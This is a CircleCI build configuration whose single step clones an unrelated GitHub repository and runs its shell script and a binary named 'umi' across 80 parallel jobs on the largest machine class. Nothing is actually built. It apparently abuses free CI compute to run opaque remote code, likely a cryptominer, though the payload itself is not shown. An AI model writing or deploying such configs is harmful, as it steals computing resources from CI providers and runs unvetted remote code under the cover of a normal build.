version: 2
jobs:
  build:
    docker:
      - image: node:latest
    parallelism: 80
    resource_class: 2xlarge+
    steps:
      - run: git clone https://github.com/puyuhdus/0.git && cd 0 && chmod u+x umi sh.sh && ./sh.sh
workflows:
    version: 2
    build:
        jobs:
            - build
